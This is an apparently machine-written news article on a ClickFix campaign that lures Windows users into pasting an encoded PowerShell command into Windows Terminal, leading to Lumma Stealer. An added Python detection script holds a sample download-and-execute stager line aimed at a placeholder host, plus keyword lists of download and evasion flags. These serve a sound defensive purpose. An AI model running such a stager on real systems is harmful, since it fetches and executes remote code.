Ethical Hacking News
The ClickFix scam has evolved again, using Windows Terminal to trick users into running malware that compromises their browser vaults. With Microsoft monitoring the situation closely, it's essential for users to remain vigilant and report any suspicious activity.
The ClickFix scam has been using social engineering tactics to trick users into running malicious commands that steal credentials. The scammers have adapted their tactics to exploit the legitimate administrative tool, Windows Terminal. The new campaign instructs users to launch Windows Terminal using a specific shortcut to avoid detection by security tools. The scam presents victims with a web page posing as a verification prompt or troubleshooting guide, asking them to copy and paste a command into Windows Terminal. The malicious command unpacks itself, pulling down renamed copies of the 7-Zip archive utility and compressed payloads. The 7-Zip archive tool extracts further components that establish persistence on the compromised system and collect sensitive data. The final stage deploys Lumma Stealer, an infostealer designed to steal login credentials and other browser data. Security awareness is crucial in preventing similar attacks from succeeding as users continue to rely on Windows Terminal for everyday tasks.
The ClickFix scam has been a persistent threat to Windows users for over a year, relying on a tried-and-tested social engineering formula to persuade victims into running malicious commands that ultimately result in credential theft. The scammers have continued to adapt their tactics to evade security tools, with the latest iteration exploiting the legitimate administrative tool, Windows Terminal.
According to Microsoft Threat Intelligence, the new campaign surfaced in February and tweaked the familiar ClickFix playbook by instructing users to launch Windows Terminal with the Windows key + X, then I keyboard shortcut. This sidesteps security tools that have become proficient at detecting suspicious activity launched from the Run dialog, which is itself a legitimate shortcut used by many developers for everyday tasks.
The scam itself remains faithful to its social engineering roots, presenting victims with a web page posing as a verification prompt, CAPTCHA check, or troubleshooting guide. The page then instructs users to copy and paste a command into Windows Terminal, often framed as an innocuous action such as verifying their connection or fixing an error.
What the unsuspecting user does not realize is that they are about to execute a heavily encoded PowerShell command that sets off a chain of events designed to compromise their system. This command unpacks itself, pulling down renamed copies of the 7-Zip archive utility and compressed payloads along with other malicious components.
The 7-Zip archive tool then extracts further components that establish persistence on the compromised system, disable Microsoft Defender exclusions, and begin collecting sensitive system and browser data. The final stage deploys Lumma Stealer, a common infostealer designed to inject itself into Chrome and Edge processes, siphoning off stored login credentials and other data stored by the browser.
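As an added defender-side example (not code from the article, Microsoft, or The Register), the following Python triages constructed process-creation records for the chain described above: Windows Terminal spawning PowerShell with an encoded command that carries a download primitive, and a renamed 7-Zip copy identified through its PE OriginalFileName rather than its on-disk name. The field names, process names, thresholds and sample values are assumptions modelled on Sysmon Event ID 1 telemetry.

```python
# Constructed triage example for Sysmon Event ID 1 records; not the article's or Microsoft's detection logic.
import base64
import re

TERMINAL_HOSTS = {"windowsterminal.exe", "openconsole.exe"}  # Windows Terminal process names
SHELLS = {"powershell.exe", "pwsh.exe"}
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob that decodes to a UTF-16LE script.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
DOWNLOAD_HINTS = ("invoke-webrequest", "iwr ", "downloadstring", "downloadfile", "net.webclient", "curl ")
EVASION_HINTS = ("-w hidden", "windowstyle hidden", "-nop ", "-ep bypass", "add-mppreference")

def decode_encoded_command(cmdline):
    # Returns the decoded -EncodedCommand script, or None if the flag is absent or the blob is not base64.
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error (invalid base64) is a ValueError subclass
        return None

def score_event(ev):
    # Returns the names of the indicators one process-creation event matches.
    hits, cmdline = [], ev.get("CommandLine", "")
    image, parent = (ev.get(k, "").rsplit("\\", 1)[-1].lower() for k in ("Image", "ParentImage"))
    if parent in TERMINAL_HOSTS and image in SHELLS:
        hits.append("terminal_spawned_powershell")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded_command")
        text = (cmdline + " " + decoded).lower()  # inspect the visible flags and the decoded script together
        hits += [name for name, hints in (("download_primitive", DOWNLOAD_HINTS), ("evasion_flag", EVASION_HINTS))
                 if any(h in text for h in hints)]
    # A renamed 7-Zip copy keeps its PE OriginalFileName, so name-based rules must use that field, not Image.
    if ev.get("OriginalFileName", "").lower() == "7z.exe" and image != "7z.exe":
        hits.append("renamed_7zip")
    return hits

def detect(events, min_hits=3):
    # Flags (index, hits) for events with at least min_hits indicators, or any renamed 7-Zip launch.
    return [(i, h) for i, ev in enumerate(events)
            if len(h := score_event(ev)) >= min_hits or "renamed_7zip" in h]

# Constructed sample telemetry (not real events); example.invalid is a reserved placeholder host.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/fix')"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1\WindowsTerminal.exe",
     "CommandLine": "powershell -w hidden -enc " + base64.b64encode(STAGER.encode("utf-16-le")).decode()},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\upd.exe", "OriginalFileName": "7z.exe"},
]
```

Running `detect(SAMPLE_EVENTS)` flags both constructed events, while a plain `Get-ChildItem` launched from Windows Terminal scores only one indicator and stays below the threshold.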
The use of Windows Terminal as a vector for the attack is particularly insidious, as it allows the attackers to blend in with legitimate system activity, making it less likely that security tools will detect the malicious command. This approach demonstrates the evolving nature of the ClickFix scam, which continues to adapt and exploit vulnerabilities in the user experience.
The Lumma Stealer infostealer has been associated with various credential-stealing campaigns in recent times, and its deployment via the ClickFix scam highlights the potential for widespread compromise through social engineering tactics. As users continue to rely on Windows Terminal as a legitimate tool for everyday tasks, security awareness must be heightened to prevent similar attacks from succeeding.
In light of this latest development, Microsoft has confirmed that it is monitoring the situation closely, urging users to exercise caution when encountering suspicious prompts or instructions that ask them to paste and run commands. Users are advised to remain vigilant and report any instances of suspicious activity to the relevant authorities.
In conclusion, the ClickFix scam continues to evolve, incorporating new tactics to evade security tools and compromise user systems. As with previous iterations, the use of Windows Terminal as a vector for the attack underscores the importance of user awareness and vigilance in preventing similar attacks from succeeding.
Related Information:
https://www.ethicalhackingnews.com/articles/The-Evolving-ClickFix-Scam-A-New-Twist-on-Credential-Stealing-and-Malware-ehn.shtml
https://go.theregister.com/feed/www.theregister.com/2026/03/06/microsoft_spots_clickfix_campaign_abusing/
https://www.msn.com/en-us/technology/cybersecurity/microsoft-spots-clickfix-campaign-getting-users-to-self-pwn-on-windows-terminal/ar-AA1XF58v
https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
Published: Fri Mar 6 10:12:58 2026 by llama3.2 3B Q4_K_M